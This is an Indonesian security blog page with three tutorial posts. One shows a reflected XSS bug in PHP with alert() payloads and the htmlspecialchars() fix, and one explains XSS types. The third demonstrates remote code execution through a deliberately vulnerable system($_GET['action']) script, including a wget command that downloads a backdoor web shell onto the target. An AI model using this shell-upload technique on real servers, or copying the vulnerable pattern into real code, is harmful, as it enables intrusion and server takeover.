Tampilkan postingan dengan label Bug. Tampilkan semua postingan
Tampilkan postingan dengan label Bug. Tampilkan semua postingan

Jumat, 04 Januari 2019

Contoh Script Bug XSS dan Tutorial Patch Bug XSS



Naufal Ardhani - Di postingan sebelumnya saya sudah membuat artikel Pengertian XSS bagi yang belom tau apa itu XSS silahkan dibaca, Bagi seorang Web Developer sangat penting mengetahui hal seperti ini supaya keamanan websitenya terjaga dan kali ini saya akan memberikan contoh script  bagaimana terjadinya bug XSS dan cara mengatasi bug XSS.

Payload :

  • <script>alert(1)</script>
  • <script>alert("XSS!!!")</script>


Bagaimana XSS bisa terjadi? cek dibawah


Sebelum lanjut membaca siapkan terlebih dahulu localhost anda untuk menjalankan script XSS,

<?php 
$url = $_GET["kata"];
echo $url;
?>


Script diatas merupakan script XSS yang terjadi pada url dan ini sangat simple tidak ada HTML ataupun CSS karena hanya untuk belajar saja hehe.


Simpan script xss dengan nama xss.php dan silahkan hidupkan localhost anda lalu buka script xss,

  • http://localhost:8888/xss.php (dihalaman ini kosong hehe)
  • dan untuk memunculkan text pada halaman tersebut anda tinggal tambahkan parameter ?kata= dan isinya, contoh : http://localhost:8888/xss.php?kata=naufalardhani.com ganti text berwarna biru dengan payload.
Nah itu adalah 2 hasil payload yang saya gunakan.

Lanjut kita bahas cara menambal bug XSS.

  • Tambahkan htmlspecialchars() seperti dibawah agar html tidak dapat berjalan dengan sempurna.
<?php 
$url = $_GET["kata"];
echo htmlspecialchars($url);
?>


  • Lalu kita save dan jalankan.

Berhasil! script html sudah tidak berjalan karena sudah di filter dengan htmlspecialchars().


Terimakasih telah membaca Contoh Script Bug XSS dan Tutorial Patch Bug XSS di blog saya, semoga bermanfaat :)

Jika ada yang tidak dipahami silahkan tanya saja di kolom komentar.

Pengertian XSS



Naufal Ardhani - Cross Site Scripting XSS adalah salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Mengapa Cross Site Scripting disingkat XSS bukannya CSS? Karna Singkatan CSS sudah digunakan untuk cascade style sheet.


Bingung script XSS seperti apa? silahkan lihat DISINI.

Tipe XSS
  • Reflected
  • Stored


Reflected XSS
Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.

Mekanisme pertahanan menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data apapun yang di-generate oleh pengguna. Jangan percayai apapun data yang dikirim oleh pengguna.

Contoh penyerangan menggunakan XSS (Nama – nama yang saya pakai merupakan karangan) :

1. Toni sering mengunjungi website jack, yang di website tersebut memungkinkan toni untuk memasukan username/password dan menyimpan data pribadi atau data transaksi yang seharusnya tidak boleh diketahui orang lain.

2. Rey mengetahui bahwa toni sering mengunjungi web tersebut, dan lalu mengamati jika di website buatan Jack terdapat kerentanan atau celah yang bisa diserang menggunakan xss

3. Rey lalu mengekplore dan mencoba mencari celahnya dan membuat script berbahaya dan kemudian di embed atau dimasukan ke dalam sbuah URL

4. Rey lalu mengirim email ke toni yang berisi link ke halaman web jack yang sebenernya urlnya sudah di embed script yang berbahaya tersebut, serta merayunya dengan alasan palsu atau sejenisnya.

5. saat Toni click URL tersebut maka toni akan masuk ke dalam website jack serta script yang sudah rey buat akan dijalankan, sehingga rey bisa mengmbil data dari cookienya dan bisa memanfaatkanya.


Stored XSS
Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.


Sekian saja artikel yang tentang pengertian XSS semoga ada dapat memahami dengan mudah dan jangan lupa berkomentar dibawah.

Referensi :
https://upyes.wordpress.com/2013/05/18/pengertian-xss/
https://en.wikipedia.org/wiki/Cross-site_scripting

Senin, 31 Desember 2018

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.

Update Template Premium Kompi Flexible Non AMP v8

Seperti kita ketahui bahwa kini kecepatan loading blog atau skor "hijau" pagespeed insight dijadikan faktor rangking di zaman inde...